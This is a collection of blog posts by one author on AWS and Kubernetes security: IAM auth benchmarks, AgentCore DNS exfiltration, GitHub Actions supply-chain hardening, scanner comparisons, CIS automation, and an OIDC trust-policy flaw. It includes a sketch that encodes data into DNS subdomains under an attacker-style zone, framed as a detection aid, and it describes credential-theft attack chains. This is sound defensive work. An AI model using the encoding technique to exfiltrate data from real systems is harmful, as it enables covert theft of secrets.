DEV Community: Mariusz Gębala

K3s on AWS in 2026: 4 IAM auth methods benchmarked

Mariusz Gębala — Wed, 06 May 2026 09:41:54 +0000

If you self-host K3s on EC2 and your pods need AWS API access, there are at least 4 distinct ways to wire that up - and most blog posts only cover 1 or 2.

I built all four on the same 3-node cluster, ran 10 cold starts each, then deliberately broke things to record failure modes:

EC2 Instance Profile (default fallback)
IRSA via S3 public bucket (the classic 2021 pattern)
IRSA via CloudFront + custom domain (private bucket, OAC)
IAM Roles Anywhere with self-signed CA (X.509 cert auth)

## 3 things I didn't expect

Setup B (IRSA via S3 public bucket) was actually faster than the baseline: 2.59s median vs 3.18s for plain Instance Profile. I assumed the S3 GET for JWKS would add latency. It didn't: STS validation against a regional S3 bucket still beat the baseline.
Caveat: image was :latest, so timings include some kubelet registry digest resolution overhead.

aws_signing_helper serve mode is broken with helper 1.8.2 + current aws-cli + K3s 1.35.4. It returns 400 on the IMDSv2 listing endpoint, and botocore overflows in _evaluate_expiration. AWS docs still describe it as supported. credential-process mode works fine.

Setup C (IRSA via CloudFront) showed a bimodal cold start: 3.97s median, 13.68s p95. 2 of 10 runs hit ~13.5s. Hypothesis: CloudFront edge cache cold misses when AWS STS fetches the JWKS. I have no direct visibility into STS, so this is inferred from the shape of the distribution.
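With only 10 runs per setup, a median and a p95 can land in completely different modes. The sketch below shows why, using synthetic timings rather than the measured ones. The nearest-rank percentile method is an assumption; the post does not say which method the benchmark used.

```python
import math
import statistics


def nearest_rank_percentile(samples: list[float], pct: float) -> float:
    """Return the pct-th percentile using the nearest-rank method."""
    if not samples:
        raise ValueError("need at least one sample")
    ordered = sorted(samples)
    # 1-based rank of the smallest value that covers pct percent of the samples
    rank = max(1, math.ceil(pct / 100 * len(ordered)))
    return ordered[rank - 1]


# Synthetic cold-start times in seconds (NOT the measured values):
# eight runs in a fast mode, two runs in a slow mode.
runs = [4.0] * 8 + [13.5] * 2

print(statistics.median(runs))            # lands in the fast mode
print(nearest_rank_percentile(runs, 95))  # lands in the slow mode
```

With ten samples, nearest-rank p95 is simply the slowest run, so two slow runs out of ten are enough to pull p95 into the slow mode while the median stays in the fast one.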

## Plus 6 failure scenarios

I broke things deliberately and recorded what each setup does when:

K3s service-account-issuer changes (most damaging - instant fail for ALL existing IRSA pods, no cached creds save you)
Clock skew exceeds 5min
IAM Role deleted mid-flight
OIDC Provider deleted
Trust policy :sub mismatch
K8s Secret deleted (Setup D specific)

The error codes are different between scenarios, which actually helps with debugging - useful distinction nobody else seems to document.

Read the full article

Architecture diagrams, complete decision matrix, raw benchmark CSVs, full Terraform code for all 4 setups:

https://haitmg.pl/blog/self-hosted-k3s-aws-auth-benchmark/

Companion repo: https://github.com/gebalamariusz/lab-irsa-benchmark

AWS Bedrock AgentCore: VPC Mode Still Leaks DNS After Unit 42 Disclosure

Mariusz Gębala — Mon, 27 Apr 2026 10:04:37 +0000

On April 7, 2026, Palo Alto Networks Unit 42 published research about a DNS exfiltration vector in AWS Bedrock AgentCore Code Interpreter. AWS had already shipped fixes during the responsible disclosure window that began in November 2025 - including documentation updates and MMDSv2 defaults from February 14, 2026. By the time the post went public, SANDBOX mode was tightened. But VPC mode without Route 53 Resolver DNS Firewall still leaks DNS (verified April 26, 2026).

Most coverage of the disclosure described two network modes. The Code Interpreter API actually offers three: PUBLIC, SANDBOX, and VPC. They behave very differently.

I spent six hours running every relevant AgentCore network mode through the same isolation tests in eu-central-1 (Frankfurt), with real Code Interpreter sessions, real Python code, and real DNS queries. The results don't match the simplified narrative most vendor blogs are repeating.

SANDBOX has been quietly tightened. PUBLIC mode is wide open. VPC mode without DNS Firewall is the gap that survives.

The paradox that broke my assumptions: I expected VPC mode (no internet gateway, no NAT) to be the most isolated. It is not - for one specific dimension. DNS in a VPC routes to AmazonProvidedDNS, which is a recursive resolver that will resolve any hostname for you, regardless of whether your VPC has internet egress. The DNS query itself (UDP/53) is the exfiltration channel, encoded as a subdomain name routed through DNS to an attacker-controlled authoritative server. TCP never has to leave.
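To make the "encoded as a subdomain name" part concrete, here is a minimal sketch of what such a query name looks like, so you know what to look for in resolver query logs. It only builds strings and sends nothing. The zone `attacker.example` and both function names are hypothetical, and base32 is an assumed encoding; the post does not say which encoding a real payload would use.

```python
import base64

MAX_LABEL = 63   # DNS limit for a single label (RFC 1035)
MAX_NAME = 253   # practical limit for a full name in text form


def encode_as_qname(payload: bytes, zone: str = "attacker.example") -> str:
    """Encode payload bytes into DNS labels under a (hypothetical) zone."""
    text = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
    labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    qname = ".".join(labels + [zone])
    if len(qname) > MAX_NAME:
        raise ValueError("payload too large for a single query name")
    return qname


def decode_qname(qname: str, zone: str = "attacker.example") -> bytes:
    """Reverse encode_as_qname: what the authoritative server would recover."""
    data = qname[: -len(zone) - 1].replace(".", "").upper()
    data += "=" * (-len(data) % 8)  # restore the stripped base32 padding
    return base64.b32decode(data)


name = encode_as_qname(b"secret-token-123")
print(name)
print(decode_qname(name))
```

Long, high-entropy leftmost labels under a single parent domain are the pattern a Route 53 Resolver DNS Firewall allowlist stops before it reaches the recursive resolver.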

In the full article, I cover:

The three network modes empirically tested with raw JSON output for each (DNS resolution, TCP connectivity, MMDSv2, S3, STS API calls)
Why VPC mode leaks DNS and the AmazonProvidedDNS routing path that makes it possible
Same agent, same code, before and after Route 53 Resolver DNS Firewall - the fix verified end-to-end with output diffs
Defense matrix mapping each mode and protection to "suitable for untrusted input?"
30-line audit script for finding insecure (PUBLIC mode) Code Interpreters across all four AgentCore regions
Lab gotchas AWS docs do not surface: self-referencing security group rule for VPC mode, the undocumented agentic_ai ENI type, asynchronous cleanup that blocks VPC teardown
Cost breakdown: $0.08 total for the six-hour lab in eu-central-1

I did not stand up a malicious DNS server to verify the full exfiltration chain, but every layer the lab measured (DNS resolution + AmazonProvidedDNS forwarding) is open. The fix is not new technology, it is a configuration AWS recommends but most tutorials skip.

Read the full article with the lab journey, JSON evidence, Terraform setup, and defense matrix

Originally published at haitmg.pl.

12 Steps to Secure GitHub Actions After the Trivy Attack

Mariusz Gębala — Wed, 15 Apr 2026 11:32:48 +0000

In March 2026, attackers compromised Trivy - one of the most popular open-source vulnerability scanners - through its GitHub Action. They force-pushed 75 of 76 version tags to malicious commits. AWS credentials, GCP tokens, SSH keys - stolen from every workflow that ran the compromised action. Within five days, the attack cascaded to Docker Hub, VS Code extensions, and PyPI (CVE-2026-33634, CVSS 9.4).

Most teams heard about this in isolation. It wasn't isolated.

I traced the full chain back 16 months - from a Personal Access Token accidentally committed in a SpotBugs workflow (November 2024), through the tj-actions/changed-files mass compromise targeting Coinbase (March 2025, CVE-2025-30066), the AI-augmented Nx/s1ngularity attack (August 2025), and the GhostAction campaign that stole 3,325 secrets from 817 repositories (September 2025) - all the way to the Trivy/TeamPCP attack and the concurrent prt-scan campaign using AI-generated payloads.

The pattern is clear: the pipeline is not the target - your AWS account is.

Every one of these attacks specifically went after cloud credentials. The Trivy payload queried the AWS Instance Metadata Service at 169.254.169.254 and the ECS task metadata endpoint at 169.254.170.2. It wasn't looking for GitHub tokens.

SHA pinning would have stopped the Trivy attack. But SHA pinning is step 1 of 12.
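As a rough illustration of what checking for SHA pinning involves, the sketch below scans workflow text for `uses:` references that are not pinned to a full 40-character commit SHA. It is a simplified, regex-based check with hypothetical names, not the tooling from the full article, and it skips local (`./`) and `docker://` references.

```python
import re

# Matches "uses: owner/repo[/path]@ref", with an optional list dash and quotes.
USES_RE = re.compile(
    r"""^\s*(?:-\s*)?uses:\s*["']?([^\s@#"']+)@([^\s#"']+)""",
    re.MULTILINE,
)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def unpinned_actions(workflow_text: str) -> list[tuple[str, str]]:
    """Return (action, ref) pairs whose ref is a tag or branch, not a full SHA."""
    findings = []
    for action, ref in USES_RE.findall(workflow_text):
        if action.startswith(("./", "docker://")):
            continue  # local and container references are out of scope here
        if not FULL_SHA_RE.match(ref):
            findings.append((action, ref))
    return findings


workflow = """
steps:
  - uses: actions/checkout@v4
  - uses: aquasecurity/trivy-action@0123456789abcdef0123456789abcdef01234567 # pinned
  - uses: ./local-action
"""
print(unpinned_actions(workflow))
```

A tag such as `v4` can be force-pushed to a different commit, which is what happened to the Trivy tags. A full commit SHA cannot be moved.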

In the full article, I cover:

A complete timeline of CI/CD supply chain attacks from November 2024 to March 2026
12 concrete hardening steps with copy-paste YAML and Terraform code - from SHA pinning and OIDC setup to egress monitoring with StepSecurity Harden-Runner
A prevention matrix showing which step would have stopped which attack
What GitHub is building next - the 2026 Actions Security Roadmap (dependency locking, native egress firewall, immutable actions)

Read the full article with all 12 steps, code examples, and sources

Originally published at haitmg.pl.

5 Open-Source AWS Security CLI Tools Worth Trying in 2026

Mariusz Gębala — Wed, 01 Apr 2026 20:41:15 +0000

TL;DR

When it comes to security, even today there's no single tool that covers everything. Prowler has a ton of checks. Trivy is the best-known tool for containers and cloud. CloudFox is a tool for pentesters. Heimdall focuses on IAM privilege escalation. cloud-audit correlates findings, assembles them into attack chains, and provides fixes you can apply via Terraform or the CLI.

There's something for everyone - it's important to choose the right one for your work style.

The landscape

Have you ever wished for a tool that could do everything for us? You know, literally everything. We'd wake up in the morning and an automatically generated list would appear on our laptop, like, "Do this project today, use this AI agent, and then we'll post it here and there - it will bring you success, fame, and money." However, I now believe that even the most refined LLM won't replace creativity and real human needs.

Based on the above, I've concluded that security scanning in AWS isn't as straightforward as it seems. Let's answer the question together - do you know what you want to check and what to do with the results provided in the report?

Some tools optimize for breadth - scanning 500+ rules across multiple clouds. Others optimize for depth, covering a smaller area far more thoroughly. Still others try to balance the two as well as they can. Is it possible to create a perfect tool that is free of noise and precisely meets the requirements of every administrator? In my opinion, no.

In this article, I'd like to present five CLI tools that I've personally tested, so I hope to provide an unbiased opinion on them (all as of April 2, 2026). If you want a deeper dive into how Prowler and ScoutSuite stack up against cloud-audit, I wrote a detailed comparison on my blog.

1. Prowler

Stars: over 13k | Checks: >550 (AWS) | Language: Python
GitHub: prowler-cloud/prowler
Install: pip install prowler

Anyone responsible for AWS environment security (and others) is likely familiar with Prowler. It's by far the most popular open-source scanner, with 572 AWS checks across 84 services and 41 compliance standards (CIS, SOC 2, HIPAA, PCI-DSS, NIST 800-53, and many more). If your auditor asks, "Are you using Prowler?" - that's a sign of how popular it is.

Advantages:

The widest range of compliance among all OSS tools
Multi-cloud: AWS, Azure, GCP, Kubernetes, and others
Active development, large community, commercial support
HTML, CSV, JSON-OCSF, SARIF output

Where it falls short:

Scan time: 10-30 minutes on a standard account (572 checks take time)
Attack path detection exists, but requires Prowler App (self-hosted Docker Compose + Neo4j + Cartography) or paid SaaS. The standard Prowler AWS CLI provides only simple results
Remediation comes as text hints, not copy-and-paste commands
Results from 572 checks can be overwhelming - you need to know which ones are relevant

Best for: Compliance-focused teams that need to check the box for CIS/SOC 2/HIPAA/PCI-DSS.

pip install prowler
prowler aws

2. Trivy

Stars: > 34k | AWS Checks: ~350-450 | Language: Go
GitHub: aquasecurity/trivy
Install: brew install trivy

This is an interesting resource. Trivy was initially designed for container vulnerability scanning, but later expanded to include cloud misconfiguration scanning. A key differentiator is the single binary that covers everything - container images, IaC files (Terraform, CloudFormation), Kubernetes, SBOM, licenses, and active AWS accounts.

What it does well:

A single binary covers containers + IaC + cloud + secrets + SBOM
Fast, Go-based
Huge community (34k stars)
CycloneDX and SPDX output for supply chain

Where it falls short:

AWS cloud scanning seems secondary to container scanning
No attack chain detection - no correlation between findings
Links to documentation pages for fixes, no CLI/Terraform output
AWS CIS compliance limited to versions 1.2 and 1.4 (not 3.0)
The March 2026 supply chain attack (Trivy's GitHub Action was compromised for about 12 hours) raised trust issues

Best for: Teams that already use Trivy for containers and want a single tool for everything.

trivy aws --region eu-central-1

3. CloudFox

Stars: >2300 | Commands: 24 AWS enumeration modules | Language: Go
GitHub: BishopFox/cloudfox
Install: brew install cloudfox

Here we're dealing with a slightly different type of tool. This isn't a typical scanner, it's a tool for cloud penetration testers. It's a reconnaissance tool that enumerates what an attacker with given credentials can actually do - which roles to assume, which secrets to read, which instances to reach.

What it excels at:

An attacker's perspective, not a defender's checklist
Enumeration across accounts and services
Generates "loot files" - ready-to-use commands that an attacker could run
Good for red teams and penetration testers

Where it falls short:

No checks, no rules, no findings - just raw enumeration data
No suggestions for remediation or fixes
No compliance framework
No HTML/PDF reports - just table and CSV output
Requires manual analysis to connect facts to attack paths

Best for: Penetration testers and red teams assessing what can actually be accessed with permissions.

cloudfox aws --profile target-account all-checks

4. Heimdall

Stars: >140 | Patterns: >50 IAM escalations, >85 attack chains | Language: Python
GitHub: DenizParlak/heimdall
Install: from source (pip install -e .)

Heimdall primarily focuses on IAM privilege escalation. It checks whether a user with limited privileges could accidentally become an administrator. It maps trust relationships between IAM roles, policies, and services to find multi-hop escalation paths (A assumes B, B has a PassRole to C, C is an administrator).
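The multi-hop idea (A assumes B, B can pass a role to C, C is an administrator) boils down to path finding in a graph. The sketch below is a generic breadth-first search over hypothetical principals. It is not Heimdall's implementation, and it treats every edge (assume-role, PassRole) the same way for simplicity.

```python
from collections import deque
from typing import Optional


def escalation_path(
    edges: dict[str, list[str]], start: str, admins: set[str]
) -> Optional[list[str]]:
    """Breadth-first search for the shortest chain from start to any admin principal."""
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        node = path[-1]
        if node in admins:
            return path
        for nxt in edges.get(node, []):
            if nxt not in seen:  # avoid revisiting principals (handles trust cycles)
                seen.add(nxt)
                queue.append(path + [nxt])
    return None


# Hypothetical principals: A can assume B, B can pass a role to C, C is admin.
edges = {"A": ["B"], "B": ["C"], "C": []}
print(escalation_path(edges, "A", {"C"}))
```

A scanner that only checks direct admin access would look at A's own policies and report nothing. The path only shows up once the hops are chained.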

What it does well:

Focuses on a difficult problem (privilege escalation) that most scanners miss
Over 85 attack chain patterns with MITRE ATT&CK mapping
Multi-hop detection (not just direct admin access)
Interactive terminal user interface
Ability to scan Terraform before deployment

Where it falls short:

Last commit: December 2025 (appears outdated)
No pip installation - cloning and installing from source required
Lack of compliance frameworks (CIS, SOC 2, etc.)
No remediation commands
Small community (146 stars, 4 commits)
AWS only

Best for: IAM-focused security reviews where the question "who can become an admin?" needs to be answered.

git clone https://github.com/DenizParlak/heimdall
cd heimdall && pip install -e .
heimdall scan

5. cloud-audit

Stars: >30 | Checks: 80 | Language: Python
GitHub: gebalamariusz/cloud-audit
Install: pip install cloud-audit
Website: haitmg.pl/cloud-audit

I created this tool. I tried to gather everything I needed most for my work. I kept running the same security reviews on AWS accounts, and I was missing one tool that would truly streamline the job, hence the idea. I needed a scanner that would show how findings connect to actual attack paths, not just a flat list.

What it does well:

20 attack chain rules that correlate findings (e.g., public SG + IMDSv1 + admin role = account takeover path)
Each finding includes AWS CLI + Terraform remediation code, not just descriptions
Compliance with AWS CIS v3.0 (62 checks) and SOC 2 Type II (43 criteria) with evidence for each check
Breach cost estimation per finding and attack chain (sources cited: IBM, Verizon DBIR)
Scan diff to track drift between runs
MCP server for AI agent integration (Claude, Cursor)
Under 60 seconds on a standard account

Where it falls short:

80 checks compared to 572 in Prowler - smaller coverage
AWS only (no multi-cloud)
Small community (31 stars)
Newer and less battle-tested

Best for: Teams that need fewer, high-signal findings with attack context and ready-to-paste fixes.

If you want to see it in action, here's a 4-minute walkthrough on YouTube where I scan a real AWS account and find 3 attack chains.

pip install cloud-audit
cloud-audit scan -R

Side-by-side comparison

	Prowler	Trivy	CloudFox	Heimdall	cloud-audit
AWS checks	572	~400	24 commands	50+ patterns	80
Attack chains	App only	No	No	Yes (85+)	Yes (20)
Remediation	Text	Doc links	No	No	CLI + Terraform
Compliance	41 frameworks	CIS 1.2/1.4	None	MITRE only	CIS v3.0, SOC 2
Multi-cloud	Yes (12+)	Yes	Yes (3)	No	No
Scan time	10-30 min	2-5 min	1-3 min	1-2 min	<60 sec
Output	HTML, CSV, SARIF, JSON	Table, SARIF, SPDX	Table, CSV, JSON	SARIF, CSV, JSON	HTML, SARIF, JSON, MD
Cost estimation	No	No	No	No	Yes

What I would actually use

For a compliance audit: Prowler. Nothing else comes close on framework coverage.

For a pentest: CloudFox. It thinks like an attacker.

For container + cloud in one pipeline: Trivy. Single binary, single CI step.

For a quick "what can an attacker actually do with my account": cloud-audit or Heimdall. Depends on whether you want IAM escalation depth (Heimdall) or broader attack chains with fixes (cloud-audit).

There is no reason to pick just one. I run Prowler for compliance evidence and cloud-audit for the attack chain context and fix code. They complement each other.

If you're looking for a more detailed breakdown of how these tools compare on specific AWS security checks, I covered that in my AWS Security Scanners Compared article. And if you're setting up security scanning in CI/CD, check out the AWS Security Audit Checklist for a step-by-step approach.

Tools and star counts verified as of April 2026. Check each project's GitHub for the latest.

CIS AWS v3.0 in 60 Seconds: Automate Compliance with Terraform

Mariusz Gębala — Fri, 27 Mar 2026 11:00:21 +0000

TL;DR: I've built a compliance engine into cloud-audit that maps 62 CIS AWS v3.0 controls to automated checks with per-control Terraform remediation. Run cloud-audit scan --compliance cis_aws_v3 to get the results. The HTML report shows which controls passed and which failed, and includes Terraform snippets for quick fixes. 55 of the 62 controls are fully automated. Disclosure: I am the author of cloud-audit.

What is the CIS AWS Foundations Benchmark?

The CIS Amazon Web Services Foundations Benchmark is a comprehensive list of security configuration recommendations published by the Center for Internet Security. Version 3.0.0 includes 62 recommendations that define the baseline security posture every AWS account should meet. Generally, this is the most frequently cited AWS security standard. It is often used during audits and commonly serves as supporting evidence for compliance programs such as ISO 27001, SOC 2, and BSI C5.

The problem with CIS compliance today

Are you preparing for your first audit? Or perhaps you've already experienced it firsthand? Simply put, you open a 200-page PDF and just want to pass the certification audit. You have to manually review every control, navigate the AWS console from left to right, top to bottom, run a multitude of CLI commands (not everything is easily accessible from the console), and finally, record all your observations in Excel. Sounds like a "very interesting" job, right? With 62 of these controls, you can safely assume 2-3 days are gone.

The audit arrives. The auditor asks, "Show me the proof for control 3.4." You think, "Here we go - I had it in screenshot number 248." Either you have a brilliant memory, or it will take you another few days to dig out all this evidence for the auditor.

You've probably guessed that I'm not the first person to think we need to automate this. AWS Security Hub maps 37 controls. Prowler maps all of them. However, neither tells you how to fix a failing control (at least not with something you can copy and paste).

I've taken part in a number of security audits, including ones involving AWS. That experience is what pushed me to fully automate this process.

What CIS AWS v3.0 actually requires

The CIS AWS Foundations Benchmark v3.0.0 has 62 recommendations across 5 sections:

Section	Controls	What it covers
1 - Identity and Access Management	22	Root MFA, password policies, access keys, IAM roles, Access Analyzer
2 - Storage	9	S3 encryption, public access blocks, RDS encryption, EFS encryption
3 - Logging	9	CloudTrail, AWS Config, VPC flow logs, S3 object-level logging
4 - Monitoring	16	CloudWatch metric filters + alarms for 15 event categories + Security Hub
5 - Networking	6	Security groups, NACLs, default SG, IMDSv2

Of these 62, 55 are automatable via AWS API calls. 7 require manual review (console-only settings, organizational decisions).

Automating the benchmark

cloud-audit v1.1.0 includes a compliance engine that maps all 62 CIS AWS Foundations Benchmark v3.0 controls to automated checks:

pip install cloud-audit
cloud-audit scan --compliance cis_aws_v3

The output shows a per-control table with PASS, FAIL, PARTIAL, or N/A for each of the 62 controls:

Compliance Assessment
CIS Amazon Web Services Foundations Benchmark v3.0.0

Readiness: 45%  (25/55 assessed controls passing)
Coverage: 62 controls total, 55 assessed, 7 not assessed

 Status  ID      Title                                          Checks
 PASS    1.4     Ensure no root access key exists                  1/1
 PASS    1.5     Ensure MFA is enabled for root                    1/1
 FAIL    1.6     Ensure hardware MFA for root                      0/1
 FAIL    1.8     Ensure password policy min length 14              0/1
 ...
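The readiness figure in the sample output is passing controls divided by assessed controls. A minimal sketch of that arithmetic follows, assuming controls that are not assessed carry the status N/A, that PARTIAL does not count as passing, and that the percentage is rounded to the nearest integer. None of this is confirmed as cloud-audit's actual logic, and the control IDs are placeholders.

```python
def readiness(statuses: dict[str, str]) -> tuple[int, int, int]:
    """Return (passing, assessed, percent) for a control-ID -> status map."""
    assessed = [s for s in statuses.values() if s != "N/A"]
    passing = sum(1 for s in assessed if s == "PASS")
    percent = round(100 * passing / len(assessed)) if assessed else 0
    return passing, len(assessed), percent


# Placeholder control IDs reproducing the counts from the sample output:
# 25 passing, 30 not passing, 7 not assessed (62 total).
statuses = {f"pass-{i}": "PASS" for i in range(25)}
statuses.update({f"fail-{i}": "FAIL" for i in range(30)})
statuses.update({f"na-{i}": "N/A" for i in range(7)})

print(readiness(statuses))  # (25, 55, 45)
```

Excluding the 7 unassessed controls from the denominator is what turns 25 of 62 (40%) into 25 of 55 (45%).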

For the HTML report with full evidence and remediation:

cloud-audit scan --compliance cis_aws_v3 --format html -o cis-report.html

What the compliance report includes

Each failing control shows:

Evidence statement - what was checked, what was found
AWS CLI remediation - the exact command to fix it
Terraform code - HCL you can copy into your infrastructure
AWS documentation link - the official reference
Attack chain context - if the failure is part of an exploitable attack path

For example, a failing CIS 1.8 (password policy) shows:

resource "aws_iam_account_password_policy" "strict" {
  minimum_password_length      = 14
  require_lowercase_characters = true
  require_uppercase_characters = true
  require_numbers              = true
  require_symbols              = true
  password_reuse_prevention    = 24
}

Attack chains in compliance context

Individual CIS benchmark checks operate in isolation. The real risk comes from combinations of failing controls, because together they form exploitable attack paths. The tool feeds its findings into 20 attack chain rules and reports exactly which chains were triggered.

For example, if both CIS 1.5 (root MFA) and CIS 3.1 (CloudTrail) fail, the scanner reports attack chain AC-09: Unmonitored administrator access - root has no MFA and there is no audit trail.
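Conceptually, a rule like AC-09 is a set of controls that must all fail at once. Here is a minimal sketch of that correlation step, using the one rule named above. The data structure and function name are hypothetical and this is not cloud-audit's actual rule engine.

```python
# Each chain ID maps to the set of CIS controls that must ALL be failing.
# Only AC-09 comes from the text; a real rule set would have more entries.
CHAIN_RULES: dict[str, set[str]] = {
    "AC-09": {"1.5", "3.1"},  # root has no MFA + no CloudTrail audit trail
}


def triggered_chains(
    failed_controls: set[str], rules: dict[str, set[str]] = CHAIN_RULES
) -> list[str]:
    """Return chain IDs whose required controls are all in the failed set."""
    return sorted(
        chain_id
        for chain_id, required in rules.items()
        if required <= failed_controls  # subset test: every required control failed
    )


print(triggered_chains({"1.5", "1.8", "3.1"}))  # ['AC-09']
print(triggered_chains({"1.5", "1.8"}))         # []
```

The second call shows the point of correlation: a missing root MFA on its own is a finding, but it only becomes a chain when the audit trail is also missing.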

This gives auditors and auditees something CIS checklists don't offer: a risk prioritization view indicating which failures are most important.

How it compares to other tools

Capability	AWS Security Hub	Prowler (OSS)	cloud-audit
CIS v3.0 controls	37 automated	62	62 (55 automated)
Remediation per control	No	CIS only	Every control (CLI + Terraform)
Attack chain detection	No	Paid App only	20 rules (free)
Cost	~$0.001/check	Free	Free

What is next

CIS is the first framework. SOC 2, BSI C5, ISO 27001, HIPAA, and NIS2 are planned.

Full documentation: haitmg.pl/cloud-audit

GitHub: github.com/gebalamariusz/cloud-audit

Have you automated your CIS compliance process? What tools are you using? I'd love to hear about your experience in the comments.

Prowler vs ScoutSuite vs cloud-audit [2026]

Mariusz Gębala — Wed, 18 Mar 2026 14:17:03 +0000

As of 2026, we can find many open source tools that scan AWS accounts for potentially unsafe configurations. Anyone who cares about the security of their AWS infrastructure has likely already searched for such tools and stumbled upon Prowler, ScoutSuite, Trivy, Steampipe, and a few others while browsing "best tools" rankings.

I've used most of them myself. I've seen both pros and cons. This prompted me to dedicate the time to creating my own scanner. In this post, I'd like to compare three CLI-based scanners - Prowler, ScoutSuite, and cloud-audit (my tool). I'll try to be as objective as possible, but I'll let the comparison speak for itself.

Each solves different problems at different scales. I'll point out where each scanner fits and where it doesn't.

Originally published at haitmg.pl

Read the full article with comparison table and code examples on haitmg.pl

I Audit AWS Accounts. 8 Out of 10 Have This GitHub Actions Backdoor.

Mariusz Gębala — Mon, 16 Mar 2026 11:17:54 +0000

TL;DR: Configuring GitHub Actions OIDC is very convenient and useful, but often dangerous. If you created a role before June 2025 and left out one specific IAM condition, you're almost certainly vulnerable to an attack that lets ANY GitHub repository assume your AWS deployment role.

The title sounds scary and clickbaity, right? Unfortunately, only the scary part is true. It's not clickbait. Last week, Google published details about a threat group called UNC6426. A single compromised npm package gave them full AWS admin access within 72 hours. How was this possible? A poisoned npm package stole a developer's GitHub token. From there, the path led straight to production on AWS, with no passwords and no alerts.

The door they used? It's probably open in your account right now.

How a single npm install led to AWS admin

Let's take a look at the attack process and try to understand it in simple terms. One developer came to work on Monday morning and made a to-do list for the day. The first task required installing an npm package, just like any other, from a trusted registry. The problem was that this package contained a credential-stealing script called QUIETVAULT. It worked by silently extracting the developer's personal GitHub token.

The attackers took the stolen token and used it to gain access to the organization's GitHub repositories. The next step was to use the open-source Nord Stream tool to extract secrets from CI/CD. Searching further, they found a GitHub Actions workflow that deployed to AWS using OIDC. OIDC is a "modern" and secure authentication method that removes the need to store access keys.

Sound bad? We're just getting started. The AWS role used by GitHub Actions was configured so that any GitHub repo could assume it. ALL of them, not just those belonging to the organization.

So what did the attackers do with this? They generated temporary AWS credentials by exploiting the misconfigured OIDC trust. Next, they deployed a CloudFormation stack with permission to create a completely new IAM role with admin access. No login credentials to steal? They created their own.

All this took less than 72 hours.

Datadog Security Labs detected over 500 roles with the exact same misconfiguration across ~275 AWS accounts. You know how? By scanning public GitHub workflows. One of them belonged to the British government's digital service...

What's OIDC and why should you care

Anyone with a passing understanding of security knows to use OIDC when connecting GitHub Actions to AWS. This approach allows communication without the need to store long-term confidential information. And that's great, that's the point. It just needs to be configured correctly.

OIDC is only as secure as the trust policy that controls who can assume the role. Configure it incorrectly and you've left the door wide open to a potential burglar.

Consider a real-life analogy. You installed the most heavily armored door in your house. Not even an explosive device can break it down. And then you hung the key to that door on the doorknob.

The vulnerability - one missing line

Here's what I find in roughly 8 out of 10 client accounts. Look at the Condition block:

"Condition": {
  "StringEquals": {
    "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
  }
}

Professional and secure, eh? Well, almost, because there's only one condition being checked - the audience. It only confirms that the token is intended for AWS. It says nothing about who is presenting it.

Now look at the secure version:

"Condition": {
  "StringEquals": {
    "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
    "token.actions.githubusercontent.com:sub": "repo:my-org/my-repo:ref:refs/heads/main"
  }
}

One line. Adding the sub claim condition locks the role down to a specific repository and branch.

Without that, you can think of it like this: you go to a concert, go through a series of personal checks, and then hand in your ticket for verification. The security guard looks at you - you have a ticket, come on in. He just didn't check if it was a ticket for this concert...

Check your account in 60 seconds

Stop reading and run this. Find all roles that trust GitHub's OIDC provider but are missing the sub condition:

aws iam list-roles --output json | jq -r '
  .Roles[]
  | select(
      .AssumeRolePolicyDocument.Statement[]
      | select(.Principal.Federated? // empty
        | endswith("token.actions.githubusercontent.com"))
      | (.Condition.StringEquals["token.actions.githubusercontent.com:sub"] //
         .Condition.StringLike["token.actions.githubusercontent.com:sub"]) == null
    )
  | "\(.RoleName) -- VULNERABLE"'

If you see output - you have a problem.

To inspect a specific role:

aws iam get-role --role-name YOUR_ROLE_NAME \
  --query 'Role.AssumeRolePolicyDocument' --output json | jq .

No sub condition in the output = vulnerable.
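If you would rather check saved policy JSON offline (for example, the output of the get-role command above), the same test can be sketched in Python. The function names are hypothetical. Unlike the jq one-liner, this version accepts any String* condition operator, and it does not judge whether the sub pattern itself is too broad (for example `repo:*`).

```python
GITHUB_OIDC = "token.actions.githubusercontent.com"


def _as_list(value):
    """IAM allows a single item or a list in several places; normalize to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def statements_missing_sub(trust_policy: dict) -> list[dict]:
    """Return Allow statements that trust GitHub OIDC without any :sub condition."""
    flagged = []
    for stmt in _as_list(trust_policy.get("Statement")):
        principal = stmt.get("Principal")
        federated = _as_list(principal.get("Federated")) if isinstance(principal, dict) else []
        if stmt.get("Effect") != "Allow":
            continue
        if not any(str(arn).endswith(GITHUB_OIDC) for arn in federated):
            continue
        condition = stmt.get("Condition") or {}
        has_sub = any(
            key.lower() == f"{GITHUB_OIDC}:sub"
            for operator, keys in condition.items()
            if "string" in operator.lower() and isinstance(keys, dict)
            for key in keys
        )
        if not has_sub:
            flagged.append(stmt)
    return flagged


# Placeholder account ID; the Condition mirrors the vulnerable example above.
vulnerable = {
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": f"arn:aws:iam::111122223333:oidc-provider/{GITHUB_OIDC}"},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": {"StringEquals": {f"{GITHUB_OIDC}:aud": "sts.amazonaws.com"}},
    }]
}
print(len(statements_missing_sub(vulnerable)))  # 1
```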

The Terraform fix

Don't use jsonencode() for this policy. Duplicate map keys in HCL silently overwrite each other - this exact bug hit the UK Government Digital Service. Use aws_iam_policy_document instead:

data "aws_iam_policy_document" "github_actions_trust" {
  statement {
    effect  = "Allow"
    actions = ["sts:AssumeRoleWithWebIdentity"]

    principals {
      type        = "Federated"
      identifiers = [aws_iam_openid_connect_provider.github.arn]
    }

    condition {
      test     = "StringEquals"
      variable = "token.actions.githubusercontent.com:aud"
      values   = ["sts.amazonaws.com"]
    }

    condition {
      test     = "StringLike"
      variable = "token.actions.githubusercontent.com:sub"
      values   = ["repo:YOUR_ORG/YOUR_REPO:ref:refs/heads/main"]
    }
  }
}

resource "aws_iam_role" "github_actions" {
  name               = "GitHubActionsRole"
  assume_role_policy = data.aws_iam_policy_document.github_actions_trust.json
}

Two separate condition blocks. No silent overwrites. No surprises.
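The silent-overwrite failure mode is not unique to HCL. As an analogy only (this is Python's JSON parser, not Terraform), the sketch below shows a duplicated key quietly dropping one of the two conditions, and a stricter parse that refuses the input instead.

```python
import json

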